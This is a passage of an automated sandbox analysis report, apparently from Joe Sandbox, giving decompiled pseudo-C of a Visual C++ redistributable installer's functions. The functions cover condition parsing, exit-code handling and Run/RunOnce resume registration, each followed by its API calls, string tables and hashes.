                                                                          															} else {
                                                                          																 *(_t209 + 0x10) = _t219;
                                                                          																goto L101;
                                                                          															}
                                                                          														}
                                                                          													} else {
                                                                          														_t234 = 1;
                                                                          														while(1) {
                                                                          															L41:
                                                                          															_t47 = _t209 + 8; // 0x560005db
                                                                          															_a4 = _t237;
                                                                          															_t237 = _t237 + 1;
                                                                          															_t220 = 0x2e;
                                                                          															_t181 =  *_t47 + _t237 * 2;
                                                                          															if(_t220 !=  *_t181) {
                                                                          																break;
                                                                          															}
                                                                          															_t234 = _t234 + 1;
                                                                          															if(_t234 <= 4) {
                                                                          																continue;
                                                                          															} else {
                                                                          																_t238 = 0x8007000d;
                                                                          																 *(_t209 + 0x30) = 1;
                                                                          																_t229 = 0x8007000d;
                                                                          																E000137D3(_t181, "condition.cpp", 0x2b9, 0x8007000d);
                                                                          																_push(_v12);
                                                                          																_t53 = _t209 + 4; // 0x70680f79
                                                                          																_push( *_t53);
                                                                          																_push("Failed to parse condition \"%ls\". Version can have a maximum of 4 parts, at position %d.");
                                                                          																goto L72;
                                                                          															}
                                                                          															goto L102;
                                                                          														}
                                                                          														GetStringTypeW(1, _t181, 1,  &_v8);
                                                                          														if((_v8 & 0x00000004) != 0) {
                                                                          															goto L41;
                                                                          														} else {
                                                                          															_t58 = _t209 + 0x18; // 0x19801
                                                                          															_t59 = _t209 + 8; // 0x560005db
                                                                          															_t229 = E00054B5A(_t224,  *_t59 + 2, _a4, _t58);
                                                                          															if(_t229 >= 0) {
                                                                          																 *(_t209 + 0x28) = 3;
                                                                          																 *(_t209 + 0x10) = 0x13;
                                                                          																goto L101;
                                                                          															} else {
                                                                          																_t238 = 0x8007000d;
                                                                          																 *(_t209 + 0x30) = 1;
                                                                          																_t229 = 0x8007000d;
                                                                          																E000137D3(_t186, "condition.cpp", 0x2cc, 0x8007000d);
                                                                          																_push(_v12);
                                                                          																_t63 = _t209 + 4; // 0x70680f79
                                                                          																_push( *_t63);
                                                                          																_push("Failed to parse condition \"%ls\". Invalid version format, at position %d.");
                                                                          																goto L72;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												} else {
                                                                          													_t224 =  *_t213 & 0x0000ffff;
                                                                          													if(_t166 == ( *_t213 & 0x0000ffff)) {
                                                                          														goto L38;
                                                                          													} else {
                                                                          														_t238 = 0x8007000d;
                                                                          														 *(_t209 + 0x30) = 1;
                                                                          														_t229 = 0x8007000d;
                                                                          														E000137D3(_t166, "condition.cpp", 0x2f7, 0x8007000d);
                                                                          														_push(_v12);
                                                                          														_t40 = _t209 + 4; // 0x70680f79
                                                                          														_push( *_t40);
                                                                          														_push("Failed to parse condition \"%ls\". Unexpected character at position %d.");
                                                                          														L72:
                                                                          														_push(_t238);
                                                                          														E0005012F();
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									} else {
                                                                          										 *_t223 = 0xf;
                                                                          										L12:
                                                                          										_t237 = 1;
                                                                          										L101:
                                                                          										 *(_t209 + 0x14) = _v12;
                                                                          										 *(_t209 + 8) =  *(_t209 + 8) + _t237 + _t237;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				L102:
                                                                          				return _t229;
                                                                          			}














































                                                                          0x000192a0
                                                                          0x00019311
                                                                          0x00000000
                                                                          0x000192a2
                                                                          0x000192a2
                                                                          0x000192a5
                                                                          0x000192df
                                                                          0x000192e2
                                                                          0x00019309
                                                                          0x00000000
                                                                          0x000192e4
                                                                          0x000192e4
                                                                          0x000192e7
                                                                          0x00019301
                                                                          0x00000000
                                                                          0x000192e9
                                                                          0x000192ec
                                                                          0x000192f9
                                                                          0x0001934a
                                                                          0x0001934a
                                                                          0x000192ee
                                                                          0x000192ee
                                                                          0x00000000
                                                                          0x000192ee
                                                                          0x000192ec
                                                                          0x000192e7
                                                                          0x00000000
                                                                          0x000192a7
                                                                          0x000192a7
                                                                          0x000192ac
                                                                          0x000192ba
                                                                          0x000192bc
                                                                          0x000192c4
                                                                          0x000192c5
                                                                          0x000192c5
                                                                          0x000192c8
                                                                          0x00000000
                                                                          0x000192c8
                                                                          0x000192a5
                                                                          0x000192a0
                                                                          0x00018fe0
                                                                          0x00000000
                                                                          0x00018fe0
                                                                          0x00018fda
                                                                          0x00018fd1
                                                                          0x00018ec3
                                                                          0x00018ec3
                                                                          0x00018f88
                                                                          0x00018f8b
                                                                          0x00018fba
                                                                          0x00000000
                                                                          0x00018f8d
                                                                          0x00018f8d
                                                                          0x00018f90
                                                                          0x00018faf
                                                                          0x00000000
                                                                          0x00018f92
                                                                          0x00018f95
                                                                          0x00018fa4
                                                                          0x00019385
                                                                          0x00019385
                                                                          0x0001934c
                                                                          0x0001934c
                                                                          0x00018f97
                                                                          0x00018f97
                                                                          0x00018f9d
                                                                          0x00018f9d
                                                                          0x00018f9d
                                                                          0x00018f95
                                                                          0x00018f90
                                                                          0x0001934d
                                                                          0x00000000
                                                                          0x00018ec9
                                                                          0x00018ec9
                                                                          0x00018ecb
                                                                          0x00018ecd
                                                                          0x00018f79
                                                                          0x00000000
                                                                          0x00018ed3
                                                                          0x00018ed3
                                                                          0x00018ed6
                                                                          0x00018efc
                                                                          0x00018efc
                                                                          0x00018eff
                                                                          0x00018f06
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00018f0a
                                                                          0x00018f0e
                                                                          0x00000000
                                                                          0x00018f10
                                                                          0x00018f10
                                                                          0x00018f11
                                                                          0x00018f17
                                                                          0x00018f1b
                                                                          0x00000000
                                                                          0x00018f1e
                                                                          0x00000000
                                                                          0x00018f0e
                                                                          0x00018f4a
                                                                          0x00018f4f
                                                                          0x00018f61
                                                                          0x00018f63
                                                                          0x00018f6b
                                                                          0x00018f6c
                                                                          0x00018f6c
                                                                          0x00018f6f
                                                                          0x00000000
                                                                          0x00018ed8
                                                                          0x00018ed8
                                                                          0x00018edb
                                                                          0x00018eee
                                                                          0x00000000
                                                                          0x00018edd
                                                                          0x00018ee0
                                                                          0x00018fe2
                                                                          0x00018fe2
                                                                          0x00018fe8
                                                                          0x000191dc
                                                                          0x000191de
                                                                          0x000191df
                                                                          0x000191df
                                                                          0x000191ec
                                                                          0x000191f9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000191fb
                                                                          0x000191fb
                                                                          0x00019202
                                                                          0x00000000
                                                                          0x00019204
                                                                          0x00019208
                                                                          0x00000000
                                                                          0x0001920a
                                                                          0x0001920d
                                                                          0x00019216
                                                                          0x0001921a
                                                                          0x00019226
                                                                          0x00019257
                                                                          0x0001925e
                                                                          0x00000000
                                                                          0x00019228
                                                                          0x00019228
                                                                          0x0001922d
                                                                          0x0001923f
                                                                          0x00019241
                                                                          0x00019249
                                                                          0x0001924a
                                                                          0x0001924a
                                                                          0x0001924d
                                                                          0x00000000
                                                                          0x0001924d
                                                                          0x00019226
                                                                          0x00019208
                                                                          0x00000000
                                                                          0x00019202
                                                                          0x00019268
                                                                          0x0001926d
                                                                          0x0001927f
                                                                          0x00019281
                                                                          0x00019289
                                                                          0x0001928a
                                                                          0x0001928a
                                                                          0x0001928d
                                                                          0x00000000
                                                                          0x00018fee
                                                                          0x00018ff1
                                                                          0x00018ffc
                                                                          0x00000000
                                                                          0x00019002
                                                                          0x00019004
                                                                          0x0001900b
                                                                          0x00019044
                                                                          0x0001904a
                                                                          0x00019050
                                                                          0x00019056
                                                                          0x0001905b
                                                                          0x0001905f
                                                                          0x0001912b
                                                                          0x0001912b
                                                                          0x0001912c
                                                                          0x0001912c
                                                                          0x0001912c
                                                                          0x0001912c
                                                                          0x00019131
                                                                          0x0001913e
                                                                          0x00019144
                                                                          0x0001914d
                                                                          0x0001914d
                                                                          0x00019150
                                                                          0x00019158
                                                                          0x0001915c
                                                                          0x00019184
                                                                          0x00000000
                                                                          0x00019186
                                                                          0x0001919b
                                                                          0x000191ae
                                                                          0x000191be
                                                                          0x00000000
                                                                          0x000191c0
                                                                          0x000191c0
                                                                          0x00000000
                                                                          0x000191c0
                                                                          0x0001919d
                                                                          0x0001919d
                                                                          0x00000000
                                                                          0x0001919d
                                                                          0x0001919b
                                                                          0x0001915e
                                                                          0x0001916c
                                                                          0x00019172
                                                                          0x00019177
                                                                          0x000191cc
                                                                          0x000191cc
                                                                          0x000191cd
                                                                          0x000191cd
                                                                          0x000191d0
                                                                          0x00018f1f
                                                                          0x00018f1f
                                                                          0x00018f23
                                                                          0x00018f28
                                                                          0x00018f28
                                                                          0x00018f2a
                                                                          0x00018f2f
                                                                          0x00019394
                                                                          0x00000000
                                                                          0x00018f35
                                                                          0x00018f35
                                                                          0x00018f3a
                                                                          0x00018f3b
                                                                          0x00018f40
                                                                          0x00018f44
                                                                          0x00019179
                                                                          0x00019179
                                                                          0x00000000
                                                                          0x00019179
                                                                          0x00019177
                                                                          0x0001906f
                                                                          0x00019071
                                                                          0x00019072
                                                                          0x00019072
                                                                          0x00019072
                                                                          0x00019075
                                                                          0x00019078
                                                                          0x0001907b
                                                                          0x0001907c
                                                                          0x00019082
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00019084
                                                                          0x00019088
                                                                          0x00000000
                                                                          0x0001908a
                                                                          0x0001908a
                                                                          0x0001908f
                                                                          0x000190a1
                                                                          0x000190a3
                                                                          0x000190ab
                                                                          0x000190ac
                                                                          0x000190ac
                                                                          0x000190af
                                                                          0x00000000
                                                                          0x000190af
                                                                          0x00000000
                                                                          0x00019088
                                                                          0x000190c2
                                                                          0x000190cc
                                                                          0x00000000
                                                                          0x000190ce
                                                                          0x000190ce
                                                                          0x000190d2
                                                                          0x000190e1
                                                                          0x000190e5
                                                                          0x00019116
                                                                          0x0001911d
                                                                          0x00000000
                                                                          0x000190e7
                                                                          0x000190e7
                                                                          0x000190ec
                                                                          0x000190fe
                                                                          0x00019100
                                                                          0x00019108
                                                                          0x00019109
                                                                          0x00019109
                                                                          0x0001910c
                                                                          0x00000000
                                                                          0x0001910c
                                                                          0x000190e5
                                                                          0x000190cc
                                                                          0x0001900d
                                                                          0x0001900d
                                                                          0x00019013
                                                                          0x00000000
                                                                          0x00019015
                                                                          0x00019015
                                                                          0x0001901a
                                                                          0x0001902c
                                                                          0x0001902e
                                                                          0x00019036
                                                                          0x00019037
                                                                          0x00019037
                                                                          0x0001903a
                                                                          0x000192cd
                                                                          0x000192cd
                                                                          0x000192ce
                                                                          0x000192d3
                                                                          0x00019013
                                                                          0x0001900b
                                                                          0x00018ffc
                                                                          0x00018ee6
                                                                          0x00018ee6
                                                                          0x00018ef4
                                                                          0x00018ef6
                                                                          0x00019397
                                                                          0x0001939a
                                                                          0x000193a0
                                                                          0x000193a0
                                                                          0x00018ee0
                                                                          0x00018edb
                                                                          0x00018ed6
                                                                          0x00018ecd
                                                                          0x00018ec3
                                                                          0x000193a3
                                                                          0x000193ab

                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,560005DB,00000001,?,00019801,?,00000000,00000000), ref: 00018E8D
                                                                          Strings
                                                                          • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 0001924D
                                                                          • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 0001903A
                                                                          • -, xrefs: 00018FF1
                                                                          • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 0001910C
                                                                          • AND, xrefs: 00019187
                                                                          • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 000190AF
                                                                          • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00018F6F
                                                                          • @, xrefs: 00018E93
                                                                          • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 000192C8
                                                                          • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 0001928D
                                                                          • Failed to set symbol value., xrefs: 00018F35
                                                                          • NOT, xrefs: 000191A7
                                                                          • condition.cpp, xrefs: 00018F5C, 00019027, 0001909C, 000190F9, 0001923A, 0001927A, 000192B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: StringType
                                                                          • String ID: -$@$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                          • API String ID: 4177115715-3640792234
                                                                          • Opcode ID: b5aaf9deb16803b9438f56268ba8742b72e9d923afda8bb7ec614330ea6d47d7
                                                                          • Instruction ID: ffb4c7566fea918e185031cd92ca41c7d71cc0f9e94b7b62d67928dcb558467c
                                                                          • Opcode Fuzzy Hash: b5aaf9deb16803b9438f56268ba8742b72e9d923afda8bb7ec614330ea6d47d7
                                                                          • Instruction Fuzzy Hash: C5E1F071644205EBEB258F54C8A9BFE7BA9FB05710F148096FA059F2C6C7B5CAC1CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E000325AF(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				void* __ebx;
                                                                          				int _t39;
                                                                          				signed int _t48;
                                                                          				intOrPtr _t50;
                                                                          				void* _t57;
                                                                          				void* _t58;
                                                                          				void* _t59;
                                                                          
                                                                          				_t45 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t43 = _a4;
                                                                          				_t50 = _a8;
                                                                          				if(E000531C7(_a4, L"DetectCondition", _t50 + 0x90) >= 0) {
                                                                          					if(E000531C7(_t43, L"InstallArguments", _t50 + 0x94) >= 0) {
                                                                          						if(E000531C7(_t43, L"UninstallArguments", _t50 + 0x9c) >= 0) {
                                                                          							if(E000531C7(_t43, L"RepairArguments", _t50 + 0x98) >= 0) {
                                                                          								_t57 = E000533DB(_t45, _t43, L"Repairable", _t50 + 0xac);
                                                                          								if(_t57 == 0x80070490 || _t57 >= 0) {
                                                                          									_t58 = E000531C7(_t43, L"Protocol",  &_v8);
                                                                          									if(_t58 < 0) {
                                                                          										if(_t58 == 0x80070490) {
                                                                          											goto L14;
                                                                          										} else {
                                                                          											_push("Failed to get @Protocol.");
                                                                          											goto L25;
                                                                          										}
                                                                          									} else {
                                                                          										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"burn", 0xffffffff) != 2) {
                                                                          											_t39 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"netfx4", 0xffffffff);
                                                                          											_t48 = 2;
                                                                          											if(_t39 != _t48) {
                                                                          												if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"none", 0xffffffff) != 2) {
                                                                          													_t59 = 0x8000ffff;
                                                                          													E0005012F(0x8000ffff, "Invalid protocol type: %ls", _v8);
                                                                          												} else {
                                                                          													 *(_t50 + 0xb0) =  *(_t50 + 0xb0) & 0x00000000;
                                                                          													goto L14;
                                                                          												}
                                                                          											} else {
                                                                          												 *(_t50 + 0xb0) = _t48;
                                                                          												goto L14;
                                                                          											}
                                                                          										} else {
                                                                          											 *(_t50 + 0xb0) = 1;
                                                                          											L14:
                                                                          											_t59 = E00031970(_t43, _t43, _t50);
                                                                          											if(_t59 >= 0) {
                                                                          												_t59 = E000317C4(_t43, _t50);
                                                                          												if(_t59 < 0) {
                                                                          													_push("Failed to parse command lines.");
                                                                          													goto L25;
                                                                          												}
                                                                          											} else {
                                                                          												_push("Failed to parse exit codes.");
                                                                          												goto L25;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to get @Repairable.");
                                                                          									goto L25;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to get @RepairArguments.");
                                                                          								goto L25;
                                                                          							}
                                                                          						} else {
                                                                          							_push("Failed to get @UninstallArguments.");
                                                                          							goto L25;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get @InstallArguments.");
                                                                          						goto L25;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to get @DetectCondition.");
                                                                          					L25:
                                                                          					_push(_t59);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t59;
                                                                          			}












                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                          • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                          • API String ID: 760788290-1911311241
                                                                          • Opcode ID: 1effc5b638ba07bb46da06c425c2f8f695c30c4f058f112df245bd337985e46b
                                                                          • Instruction ID: c1eeb7f3297fde685540a0d0bb834405564043aa90af5f67e6a9ec44fa0783e0
                                                                          • Opcode Fuzzy Hash: 1effc5b638ba07bb46da06c425c2f8f695c30c4f058f112df245bd337985e46b
                                                                          • Instruction Fuzzy Hash: F8410832B88726B6C72771648C43FAFB55DAF12B71F200311FE11BA2D1C765AD0486D6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E00031970(void* __ebx, int _a4, intOrPtr _a8) {
                                                                          				int _v8;
                                                                          				void* _v12;
                                                                          				int _v16;
                                                                          				void* _v20;
                                                                          				int _v24;
                                                                          				intOrPtr* _t50;
                                                                          				intOrPtr _t60;
                                                                          				int _t61;
                                                                          				int _t68;
                                                                          				void* _t74;
                                                                          				intOrPtr _t78;
                                                                          				intOrPtr* _t87;
                                                                          				intOrPtr* _t88;
                                                                          				intOrPtr _t89;
                                                                          				intOrPtr _t92;
                                                                          				intOrPtr* _t94;
                                                                          				int _t98;
                                                                          				int _t100;
                                                                          				intOrPtr* _t102;
                                                                          				intOrPtr _t103;
                                                                          
                                                                          				_t100 = 0;
                                                                          				_v20 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_t103 = E00053803(_a4, L"ExitCode",  &_v20);
                                                                          				if(_t103 >= 0) {
                                                                          					_t50 = _v20;
                                                                          					_t103 =  *((intOrPtr*)( *_t50 + 0x20))(_t50,  &_v16);
                                                                          					if(_t103 >= 0) {
                                                                          						_t52 = _v16;
                                                                          						if(_v16 == 0) {
                                                                          							L35:
                                                                          							_t103 = _t100;
                                                                          						} else {
                                                                          							_t60 = E000138D4(_t52 * 0xc, 1);
                                                                          							_t89 = _a8;
                                                                          							 *((intOrPtr*)(_t89 + 0xb4)) = _t60;
                                                                          							if(_t60 != 0) {
                                                                          								_t61 = _v16;
                                                                          								 *((intOrPtr*)(_t89 + 0xb8)) = _t61;
                                                                          								_a4 = 0;
                                                                          								if(_t61 == 0) {
                                                                          									goto L35;
                                                                          								} else {
                                                                          									_t98 = 0;
                                                                          									_v24 = 0;
                                                                          									while(1) {
                                                                          										_t102 =  *((intOrPtr*)(_t89 + 0xb4)) + _t98;
                                                                          										_t103 = E00053760(_t89, _v20,  &_v12, 0);
                                                                          										if(_t103 < 0) {
                                                                          											break;
                                                                          										}
                                                                          										_t103 = E000531C7(_v12, L"Type",  &_v8);
                                                                          										if(_t103 < 0) {
                                                                          											_push("Failed to get @Type.");
                                                                          											goto L34;
                                                                          										} else {
                                                                          											if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"success", 0xffffffff) != 2) {
                                                                          												_t68 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"error", 0xffffffff);
                                                                          												_t92 = 2;
                                                                          												if(_t68 != _t92) {
                                                                          													if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"scheduleReboot", 0xffffffff) != 2) {
                                                                          														if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"forceReboot", 0xffffffff) != 2) {
                                                                          															_push(_v8);
                                                                          															_t103 = 0x8000ffff;
                                                                          															_push("Invalid exit code type: %ls");
                                                                          															goto L31;
                                                                          														} else {
                                                                          															 *_t102 = 4;
                                                                          															goto L20;
                                                                          														}
                                                                          													} else {
                                                                          														 *_t102 = 3;
                                                                          														goto L20;
                                                                          													}
                                                                          												} else {
                                                                          													 *_t102 = _t92;
                                                                          													goto L20;
                                                                          												}
                                                                          											} else {
                                                                          												 *_t102 = 1;
                                                                          												L20:
                                                                          												_t103 = E000531C7(_v12, L"Code",  &_v8);
                                                                          												if(_t103 < 0) {
                                                                          													_push("Failed to get @Code.");
                                                                          													goto L34;
                                                                          												} else {
                                                                          													_t93 = _v8;
                                                                          													_t74 = 0x2a;
                                                                          													if(_t74 !=  *_v8) {
                                                                          														_t100 = 0;
                                                                          														_t103 = E000129DC(_t93, _t98, _t93, 0, _t102 + 4);
                                                                          														if(_t103 < 0) {
                                                                          															_push(_v8);
                                                                          															_push("Failed to parse @Code value: %ls");
                                                                          															L31:
                                                                          															_push(_t103);
                                                                          															E0005012F();
                                                                          														} else {
                                                                          															goto L24;
                                                                          														}
                                                                          													} else {
                                                                          														 *((intOrPtr*)(_t102 + 8)) = 1;
                                                                          														_t100 = 0;
                                                                          														L24:
                                                                          														_t94 = _v12;
                                                                          														if(_t94 != 0) {
                                                                          															 *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                          															_v12 = _t100;
                                                                          														}
                                                                          														_t78 = _a4 + 1;
                                                                          														_t98 = _v24 + 0xc;
                                                                          														_a4 = _t78;
                                                                          														_v24 = _t98;
                                                                          														if(_t78 >= _v16) {
                                                                          															goto L35;
                                                                          														} else {
                                                                          															_t89 = _a8;
                                                                          															continue;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L36;
                                                                          									}
                                                                          									_push("Failed to get next node.");
                                                                          									goto L34;
                                                                          								}
                                                                          							} else {
                                                                          								_t103 = 0x8007000e;
                                                                          								E000137D3(_t60, "exeengine.cpp", 0x272, 0x8007000e);
                                                                          								_push("Failed to allocate memory for exit code structs.");
                                                                          								L34:
                                                                          								_push(_t103);
                                                                          								E0005012F();
                                                                          							}
                                                                          						}
                                                                          						L36:
                                                                          					} else {
                                                                          						_push("Failed to get exit code node count.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to select exit code nodes.");
                                                                          					L2:
                                                                          					_push(_t103);
                                                                          					E0005012F();
                                                                          				}
                                                                          				_t87 = _v20;
                                                                          				if(_t87 != 0) {
                                                                          					 *((intOrPtr*)( *_t87 + 8))(_t87);
                                                                          				}
                                                                          				_t88 = _v12;
                                                                          				if(_t88 != 0) {
                                                                          					 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t103;
                                                                          			}
























                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00031A77
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00031A95
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareHeapString$AllocateProcess
                                                                          • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeuser.cpp$forceReboot$scheduleReboot$success
                                                                          • API String ID: 2664528157-1714101571
                                                                          • Opcode ID: 2dafa3c0ca9b3945123928648fac4025ff7a4fdc7a424a6dd02677255171c01d
                                                                          • Instruction ID: e6de628d7ca9b326e90e5da2b067b3dfad81cf8b003c0918024c6de1e9d52c35
                                                                          • Opcode Fuzzy Hash: 2dafa3c0ca9b3945123928648fac4025ff7a4fdc7a424a6dd02677255171c01d
                                                                          • Instruction Fuzzy Hash: A261F375E0421ABBCB229B94CC41EEEBBBDEF48720F204255F914AB2D1DB719E40D791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 73%
                                                                          			E0001F09D(void* __edx, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				signed short _t54;
                                                                          				signed short _t59;
                                                                          				void* _t70;
                                                                          				void* _t71;
                                                                          				void* _t76;
                                                                          				intOrPtr _t77;
                                                                          				void* _t79;
                                                                          
                                                                          				_t76 = __edx;
                                                                          				_t77 = _a4;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_t5 = _t77 + 8; // 0x17886800
                                                                          				_v20 = 0;
                                                                          				_push(E00023C30( *_t5));
                                                                          				_push(E00023C30(_a16));
                                                                          				_push(E00024257(_a12));
                                                                          				_t9 = _t77 + 0x50; // 0x60b8868
                                                                          				E0001550F(2, 0x20000173,  *_t9);
                                                                          				E000539CD( &_v16,  &_v20);
                                                                          				_t70 = _a8;
                                                                          				_t47 =  >=  ? L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" : L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
                                                                          				_a4 =  >=  ? L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" : L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
                                                                          				if(_t70 == 0) {
                                                                          					L6:
                                                                          					if(_a12 == 1) {
                                                                          						goto L8;
                                                                          					} else {
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					_t79 = E00051344(_t70, L"Resume", _a12);
                                                                          					if(_t79 >= 0) {
                                                                          						if(_a12 != 3) {
                                                                          							goto L6;
                                                                          						} else {
                                                                          							_t79 = E00051344(_t70, L"Installed", 1);
                                                                          							if(_t79 >= 0) {
                                                                          								L7:
                                                                          								if(_a16 == 0) {
                                                                          									L17:
                                                                          									_t31 = _t77 + 0x4c; // 0xa79f685
                                                                          									_t79 = E00050E3F( *_t31, _a4, 0x20006,  &_v8);
                                                                          									if(_t79 == 0x80070002 || _t79 == 0x80070003) {
                                                                          										_t79 = 0;
                                                                          										goto L22;
                                                                          									} else {
                                                                          										_t32 = _t77 + 0x10; // 0x6ae8fc75
                                                                          										_t59 =  ==  ? 0 : RegDeleteValueW(_v8,  *_t32);
                                                                          										if(_t59 == 0) {
                                                                          											L22:
                                                                          											if(_t70 != 0) {
                                                                          												_t54 =  ==  ? 0 : RegDeleteValueW(_t70, L"BundleResumeCommandLine");
                                                                          												if(_t54 != 0) {
                                                                          													_t82 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          													_t79 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          													E000137D3(0x80004005, "registration.cpp", 0x4e1, _t79);
                                                                          													_push("Failed to delete resume command line value.");
                                                                          													goto L25;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t85 =  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
